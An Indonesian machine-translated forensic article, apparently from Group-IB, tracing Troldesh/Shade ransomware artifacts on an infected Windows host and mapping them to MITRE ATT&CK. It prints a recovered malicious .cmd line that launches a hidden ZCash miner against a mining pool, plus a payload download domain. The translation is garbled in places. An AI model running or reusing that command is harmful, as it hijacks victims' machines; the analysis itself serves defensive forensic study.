Jika Anda mengikuti
berita , maka Anda mungkin tahu tentang serangan besar-besaran baru-baru ini pada perusahaan Rusia terhadap virus ransomware Troldesh (Shade), salah satu pengunci crypto yang paling populer di kalangan penjahat cyber. Pada bulan Juni saja, Group-IB menemukan lebih dari 1.100 email phishing dari Troldesh yang dikirim atas nama karyawan maskapai besar, dealer mobil, dan media.
Pada artikel ini, kita akan melihat artefak forensik yang dapat ditemukan setelah serangan Shade / Troldesh pada media dari perangkat yang dikompromikan, dan juga membandingkan taktik dan teknik yang digunakan oleh penyerang dengan MITER ATT & CK.
Diposting oleh
Oleg Skulkin , spesialis forensik terkemuka di Group-IB
Troldesh, juga dikenal sebagai Shade, XTBL, Trojan.Encoder.858, Da Vinci, No_more_ransome, adalah virus yang mengenkripsi file pada perangkat pengguna yang terinfeksi dan memerlukan tebusan untuk mengembalikan akses ke informasi. Kampanye terbaru dengan Troldesh telah menunjukkan bahwa sekarang ini tidak hanya mengenkripsi file, tetapi juga cryptocurrency penambang dan menghasilkan lalu lintas ke situs web untuk meningkatkan lalu lintas dan pendapatan dari iklan online.
Pertama kali aktivitas Troldesh terdeteksi oleh pakar Group-IB pada tahun 2015, mereka memperhatikan bahwa virus tersebut berhasil menghindari alat perlindungan antivirus. Penyerang secara teratur mengubah "packer" - program packer yang mengurangi ukuran file dan membuatnya sulit untuk dideteksi dan dibalik - karena itu, program antivirus sering melewatkannya. Pada akhir tahun 2018, Troldesh menjadi salah satu virus paling populer dan dengan percaya diri masuk dalam 3 besar, bersama dengan RTM dan Pony. Para ahli PaloAlto Networks melaporkan bahwa Troldesh bekerja tidak hanya untuk keperluan Rusia - di antara negara-negara yang terkena ransomware adalah Amerika Serikat, Jepang, India, Thailand, dan Kanada.
Vektor infeksi awal
Biasanya, "Troldesh / Shade" didistribusikan melalui email phishing dengan lampiran berbahaya, misalnya, arsip yang dilindungi kata sandi yang berisi file JS berbahaya, setelah dibuka di mana cryptolocker diunduh dan diluncurkan. Apa artinya ini? Ini akan menjadi ide yang baik untuk memulai studi kami dengan menganalisis jejak pembukaan arsip tersebut. Di mana jejak tersebut dapat ditemukan? Misalnya, dalam Daftar Langsung:
Data diekstraksi dari file 5f7b5f1e01b83767.automaticDestinations-ms menggunakan JLECmd
Jadi, kita melihat bahwa pengguna membuka arsip dengan nama "kata sandi 11.rar tentang pemesanan". Tapi bagaimana dia masuk ke sistem? File ini terletak di direktori Unduhan, kemungkinan besar itu diunduh dari Internet. Mari kita lihat sejarah peramban:
Data diekstraksi dari file WebCache01.dat menggunakan Belkasoft Evidence Center
Seperti yang Anda lihat, file diunduh menggunakan browser web Microsoft Edge dan disimpan di direktori Unduhan. Selain itu, tepat sebelum mengunduh, pengguna mengunjungi situs web-mail, oleh karena itu, arsip diterima melalui email.
Jadi, kita berhadapan dengan teknik yang paling umum: T1193 - “Spearphishing Attachment”.
Mulai dan pintas mekanisme perlindungan
Jika kita melihat ke dalam arsip, kita akan menemukan file JS dengan nama yang hampir sama. Agar malware memuat dan mulai bekerja, pengguna harus mengklik dua kali pada file yang ditentukan. Setelah itu, "wscript.exe" akan meluncurkan file JS, yang akan mengunduh file jahat dari
mat.tradetoolsfx [.] Com dan jalankan. Bisakah kita menemukan jejak ini di disk? Tentu saja!
Mari kita lihat file prefetch wscript.exe, dengan fokus pada file-file yang berinteraksi dengannya:
<...>
\ VOLUME {01d3dcb4976cd072-3a97874f} \ PENGGUNA \ 0136 \ APPDATA \ LOKAL \ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\ VOLUME {01d3dcb4976cd072-3a97874f} \ PENGGUNA \ 0136 \ APPDATA \ LOKAL \ TEMP \ 7ZO84024637 \ DETAIL PESANAN A.JS
<...>
Jadi, kami memiliki dua file menarik. Pertama, sekarang kita tahu nama file JS yang ada di arsip, dan kedua, kami menemukan nama file yang diunduh. Saatnya mencari tahu dari mana itu diunduh. Mari kita lihat WebCache01.dat lagi:
Data diambil dari WebCache01.dat menggunakan ESEDatabaseView
Jika kami mendekode konten bidang ResponseHeaders, kami mendapatkan yang berikut:
HTTP / 1.1 200 OK
Tipe-Konten: gambar / jpeg
Panjang Konten: 1300656
ETag: "5ced19b6-13d8b0"
Ketat-Transport-Security: max-age = 31536000;
Sebenarnya, ini bukan file JPG, tetapi file yang dapat dieksekusi yang mendekripsi dan meluncurkan instance Shade.
Jadi teknik apa yang kita hadapi di sini? Scripting (T1064), Eksekusi Pengguna (T1204), dan Masquerading (T1036).
Pin sistem
"Naungan" menggunakan cara yang agak sepele untuk memperbaiki sistem - kunci registri "Perangkat Lunak \ Microsoft \ Windows \ CurrentVersion \ Run" (T1060). Kita sudah tahu bahwa file JS jahat dibuka oleh pengguna "0136", jadi lihatlah file yang sesuai "NTUSER.DAT":
Mekanisme penguncian dalam sistem terdeteksi oleh Belkasoft Evidence Center
Tapi itu belum semuanya! Lebih jauh lebih menarik:
Mekanisme penguncian dalam sistem terdeteksi oleh Belkasoft Evidence Center
Seperti yang dapat Anda lihat di ilustrasi, ada entri menarik lain yang menunjuk ke C: \ ProgramData \ SysWOW64 \ leWRX7w.cmd. Mari kita lihat apa yang ada di dalam file ini:
gema CreateObject ("Wscript.Shell"). Jalankan "" ^ & WScript. Argumen (0) ^ & "", 0, False> "% TEMP% / pxNXSB.vbs" && start / WAIT wscript.exe "% TEMP% /pxNXSB.vbs "" C: \ Users \ 0136 \ AppData \ Roaming \ SOFTWA ~ 1 \ NHEQMI ~ 1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep% TEMP% \ pxNXSB.vbs "
Jadi, kami punya satu file lagi. Dilihat dari isinya, digunakan oleh penyerang untuk menambang cryptocurrency ZCash. Jadi, bahkan jika korban membayar tebusan, sumber daya sistemnya masih akan digunakan oleh pengganggu.
Konsekuensinya
Pertama-tama, "Shade" adalah cryptoclocker, jadi hal pertama yang menarik perhatian Anda adalah banyak file dengan ekstensi "CRYPTED000007", file "Read Me", serta wallpaper "segar" di desktop Anda:
File dengan gambar ini dapat ditemukan di direktori C: \ Users \% username% \ AppData \ Roaming. Peralatan apa yang kita hadapi? "Data Dienkripsi untuk Dampak" (T1486).
Tapi, seperti yang sudah Anda pahami, "Naungan" bukanlah loker kripto biasa. Selain cryptoclocker itu sendiri, kami juga menemukan penambang, yang berarti perlu menyebutkan teknik lain - "Pembajakan Sumber Daya".
ATT & CK MITER
Analisis kami mengungkapkan sejumlah taktik dan teknik distributor Shade, mari kita simpulkan: